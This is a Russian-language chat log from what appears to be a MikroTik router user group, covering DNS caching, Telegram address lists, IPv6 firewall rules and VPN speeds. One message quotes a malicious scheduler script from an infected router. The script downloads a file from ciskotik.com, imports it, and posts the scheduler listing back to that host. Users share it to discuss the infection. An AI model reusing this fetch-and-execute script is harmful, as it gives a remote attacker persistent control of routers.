личный

для дома dnsmasq я сделал (pihole), в нём ttl поставил 1 час, чтобы все запросы кешировались по максимуму

можно на каком-нибудь alpine linux, который вообще мелкий

у меня для днс отдельная железка, что-то сделать - не проблема. но это не защитит от падения сервака

господа, очередной скрипт с зараженного МТ и вот его содержание (точнее сказать, содержание файла, который по шедулеру грузится на МТ): /system scheduler set U4 on-event="/tool fetch url=http://ciskotik.com/poll/1d1a77d8-29db-42e7-8988-9e60d465c4e0 mode=http dst-path=7xe7zt46hb08\r\n/import 7xe7zt46hb08" { :local result [/system schedule print as-value ]; /tool fetch url="http://ciskotik.com/api/scheduler" mode=http http-data=$result;}

Шота у меня ciskotik.com не резолвится...

Шота у меня ciskotik.com не резолвится...

:D

Самое время зарегистрировать ciskotik.com

Шота у меня ciskotik.com не резолвится...

Его, похоже, нет уже

Его, похоже, нет уже

лол?

А, понял

просто отпишусь тут на счет вчерашнего вопроса. в общем переделал я правила, пробовал пптп. особо это не помогло проблема по сути оставалась. нагрузка после смены правил стала меньше но проблема не ушла. в общем попробовал я сегодня другой впн (hideme) и о чудо никаких задержек и тд. канал отдает 35 мегабит от 100 мб и никаких возростаний пингов и тд. проц канеш скачет но максимум до 76%.

Самое время зарегистрировать ciskotik.com

надо зарегать otik.com и лепить домены 3-го уровня там

у меня для днс отдельная железка, что-то сделать - не проблема. но это не защитит от падения сервака

если упадёт - всё просто будет идти в туннель с 0.5сек задержками. А потом вы поднимите днс обратно)

ладно, спасибо тут все как на рынке проталкивают свои идеи, даже если вопрос не в этом был)

ну кстати заскриптовать-то это можно не обязательно на микроте. Можно просто на баше сделать

Не в тему вопрос, а Яндекс почта у всех не работает или только в Беларуси?

ну кстати заскриптовать-то это можно не обязательно на микроте. Можно просто на баше сделать

и где его выполнять?

на машине, где есть баш))

Не в тему вопрос, а Яндекс почта у всех не работает или только в Беларуси?

у меня медленно но открылась

ребятушки а подскажите как вы телеграм заворачиваете? я кто му что они ж постоянно меняют айпишники

у меня медленно но открылась

у меня с 16.10 глюки и через POP и через браузер.

а через ВПН?

ребятушки а подскажите как вы телеграм заворачиваете? я кто му что они ж постоянно меняют айпишники

Я сокс прописал, а трафик своего сокс уже заворачиваю в впн

ребятушки а подскажите как вы телеграм заворачиваете? я кто му что они ж постоянно меняют айпишники

не все меняют же, наверное. Я прописал подсети их AS'ки

ну проксю и я юзаю

(AS'ок)

а через ВПН?

VPN не проверял, да и не надо, у нас не блокируют , хотел понять просто глобалный сбой или нет.

а вот на микротике как то рулите такое? телегу

сервер для днс-сервера? а потом еще сервер для сервера

аддресс-лист просто и всё

аддресс-лист просто и всё

для телеги?

да

и сколько ж там адресов?

поделись плез

и сколько ж там адресов?

я просто сделал статик-днс, уже полгода работает

статик днс куда ?

# LIST ADDRESS CREATION-TIME TIMEOUT 0 addr-list_devps telegram.org apr/23/2018 10:55:20 1 addr-list_devps 149.154.160.0/20 may/04/2018 18:42:31 2 addr-list_devps 149.154.164.0/22 may/04/2018 18:42:52 3 addr-list_devps 149.154.168.0/22 may/04/2018 18:43:19 4 addr-list_devps 149.154.172.0/22 may/04/2018 18:44:02 5 addr-list_devps 91.108.4.0/22 may/04/2018 18:44:06 6 addr-list_devps 91.108.8.0/22 may/04/2018 18:44:18 7 addr-list_devps 91.108.12.0/22 may/04/2018 18:46:48 8 addr-list_devps 91.108.16.0/22 may/04/2018 18:46:58 9 addr-list_devps 91.108.56.0/22 may/04/2018 18:47:09

до правильного айпишника. дом ру например https режет только подменой днс

несколько /22 сетей, и отдельно адрес telegram.org

а,я немного тупанул) это api у меня через статик днс

ну вот смотри они их меняютт регулярно

а сама телега по ipv6

провайдер поддерживает 6?

да. но можно 4to6

на проксе, через которую у меня всё работает, заданы те же самые подсети, как единственные разрешённые, и всё работает.

у миеня провайдер не умеет 6

то есть, то того, что они меняют, старые они не удаляют

на проксе, через которую у меня всё работает, заданы те же самые подсети, как единственные разрешённые, и всё работает.

как давно?

через старые весь мир работает

ради рашки они не будут от своих AS'ок отказываться же

ага вот как

как давно?

с начала блокировок

спасибо

Хорошую инструкцию про фаервол ипв6 какую посоветуете ?

/ipv6 firewall filter add action=accept chain=input in-interface-list=LAN add action=accept chain=input connection-state=established,related in-interface-list=WAN add action=accept chain=forward connection-state=established,related in-interface-list=WAN add action=accept chain=forward dst-address-list=list-ipv6_int_exposed in-interface-list=WAN add action=accept chain=forward in-interface-list=LAN out-interface-list=WAN add action=drop chain=input add action=drop chain=forward )))

всё то же, что в4, только меньше, так как не нужны НАТы

изнутри наружу разрешить всё снаружи внутрь запретить всё, кроме отдельных dst-addr/портов

я прям кайфую. в4 - 27 правил, в6 - 7 правил

а как ты в В4 насобирал 27 при ТАКОМ ЖЕ подходе?

а, сорян, там ещё VPN-интерфейсам forward настроен в локалку и между собой

ну и отдельно разрешены форварды после дната

плюс hairpin

ERROR: S client not available

add action=accept chain=forward dst-address-list=list-ipv6_int_exposed in-interface-list=WAN если это отключить внутрь не пролезут?

да. Это вместо НАТа разрешение на подключение извне к веб-серверу

да. Это вместо НАТа разрешение на подключение извне к веб-серверу

спасибо за инструкцию!

в нате не надо сочинать ничего. Беда для любителей netmap

в нате не надо сочинать ничего. Беда для любителей netmap

но не все порты на IP можно открывать?

ну съедобны-то все грибы

так что можно открывать все)

если, например, ssh сслушает только на локальном адресе, то пусть порт разрешён в фаерволе - ему никто не ответит

я закрывал порты уже на конечной машине

имею ввиду открыть снаружи только часть портов определенного внутреннего IP можно?

Ну конечно, всё как в v4

ничего не узнать без содержимого тех файлов)

ничего не узнать без содержимого тех файлов)

Это и есть файл с МТ

экзешник

хм, а чем отличается hAP mini от hAP lite? кроме цены и +1 порта у второго

ничем же?

ничем же?

в теории ничем

и как, никаких проблем?)

и как, никаких проблем?)

они у меня в роли дополнительных точек в основном. в одном месте как роутер под 40 мегабит тунеля

а можно как то сделать чтоб микротик пиликал на событие

ну к примеру пиликал

Скриптами можно.

И как-то ещё вроде.

там изменился адрес на интерфейсе он пилик пилик

если слышишь меня - пиликни скриптом

как скриптами

где там достать событие

а можно как то сделать чтоб микротик пиликал на событие

не совсем. только регулярно запускать скрипт в шедулере

ну это как то ну совсем